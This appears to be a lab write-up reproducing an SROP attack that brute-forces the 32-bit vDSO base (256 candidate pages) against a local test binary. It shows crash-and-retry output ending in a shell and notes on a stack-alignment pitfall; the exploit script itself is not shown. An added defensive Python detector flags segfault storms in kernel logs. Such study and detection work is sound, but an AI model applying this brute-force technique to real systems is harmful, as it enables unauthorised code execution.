1 Overview
https://www.anquanke.com/post/id/85810
Introduction to Sigreturn Oriented Programming attacks
That article describes brute-forcing the 32-bit vDSO base address.
This post is my reproduction of it, with notes.
2 Brute-forcing the 32-bit vDSO
2.1 Principle
In the 32-bit vDSO only one byte of the base address is random, so there are just 256 candidate page bases:
vdso_range = range(0xf7700000, 0xf7800000, 0x1000)
2.2 Program
Makefile
Test environment: Ubuntu-16.04
2.3 EXP
2.4 Test results
millionsky@ubuntu-16:~/tmp/srop_test3$ python srop32_crack_vdso.py
nTry 218
[+] Starting local process './srop_test': pid 26870
vdso_addr: 0xf7773000
[*] Process './srop_test' stopped with exit code -11 (SIGSEGV) (pid 26870)
nTry 219
[+] Starting local process './srop_test': pid 26873
vdso_addr: 0xf7742000
[*] Switching to interactive mode
$ whoami
millionsky
$ ls
core srop32_crack_vdso.py srop_test
makefile srop32_crack_vdso.tar.gz srop_test.c
$ exit
[*] Got EOF while reading in interactive
$
[*] Process './srop_test' stopped with exit code 0 (pid 26873)
[*] Got EOF while sending in interactive
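Two things a defender can take straight from sections 2.1 and 2.4: the 8-bit search space that makes the guess loop feasible, and the storm of SIGSEGV exits it leaves behind, one short-lived process per wrong guess. This is an added example, not code from the original post or its author; the dmesg-style lines are constructed (their shape follows the kernel's "segfault at ... ip ... sp ..." message), and find_crash_storms with its window/threshold values is my own heuristic.

```python
import math
import re
from collections import defaultdict

# Constructed dmesg-style lines modelling the crash storm a vDSO guess loop
# produces: a fresh short-lived process per guess, each dying with SIGSEGV.
SAMPLE_LOG = """\
[  100.001] srop_test[26860]: segfault at f7700000 ip 00000000f7700000 sp 00000000ffc0a0f0 error 14
[  100.053] srop_test[26863]: segfault at f7701000 ip 00000000f7701000 sp 00000000ffcc1ab0 error 14
[  100.104] srop_test[26866]: segfault at f7702000 ip 00000000f7702000 sp 00000000ffd19f80 error 14
[  100.157] srop_test[26869]: segfault at f7703000 ip 00000000f7703000 sp 00000000ffe32c10 error 14
[  100.209] srop_test[26872]: segfault at f7704000 ip 00000000f7704000 sp 00000000fff4e0d0 error 14
[  100.262] srop_test[26875]: segfault at f7705000 ip 00000000f7705000 sp 00000000ff9ab300 error 14
[  400.500] firefox[4021]: segfault at 0 ip 00007f0a12345678 sp 00007ffd1234abcd error 4
"""

SEGV_RE = re.compile(r"^\[\s*(?P<ts>\d+\.\d+)\]\s+(?P<comm>\S+)\[(?P<pid>\d+)\]: "
                     r"segfault at [0-9a-f]+ ip (?P<ip>[0-9a-f]+)")

def vdso_search_space(start, end, step):
    """Candidate page bases in [start, end) and the bits of entropy they carry."""
    n = len(range(start, end, step))
    return n, round(math.log2(n))

def parse_segfaults(text):
    """Return (timestamp, comm, pid, ip) for every kernel segfault line in text."""
    events = []
    for line in text.splitlines():
        m = SEGV_RE.match(line)
        if m:
            events.append((float(m["ts"]), m["comm"], int(m["pid"]), int(m["ip"], 16)))
    return events

def find_crash_storms(events, window=60.0, threshold=5):
    """Flag binaries whose distinct pids segfaulted >= threshold times within `window` seconds.
    A genuine bug crashes one pid; a brute force crashes many pids sweeping addresses."""
    by_comm = defaultdict(list)
    for ts, comm, pid, ip in events:
        by_comm[comm].append((ts, pid, ip))
    storms = {}
    for comm, evs in by_comm.items():
        evs.sort()
        best, start = 0, 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            best = max(best, len({e[1] for e in evs[start:end + 1]}))
        if best >= threshold:
            storms[comm] = (best, len({e[2] for e in evs}))  # (max pids in window, distinct ips)
    return storms
```

On a real host, feed it the output of dmesg or the kernel journal; the single firefox crash is ignored while srop_test, with six distinct pids faulting at six different addresses inside a second, is reported.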
2.5 Problems encountered during testing
Testing the 32-bit program on 64-bit Ubuntu 16.04 failed (even after adjusting /bin/sh, bss, sigreturn_offset and syscall_offset).
- The failure comes from the stack overflow in main being awkward to exploit: at entry, main rounds ESP down to an aligned value and stores addr_of_argc at EBP-4; at the end of main, ESP is restored from the addr_of_argc saved at EBP-4, so the overwritten frame does not return where expected.
When the vulnerable code is moved into a separate function, the brute force succeeds.
3 References
1. Introduction to Sigreturn Oriented Programming attacks. https://www.anquanke.com/post/id/85810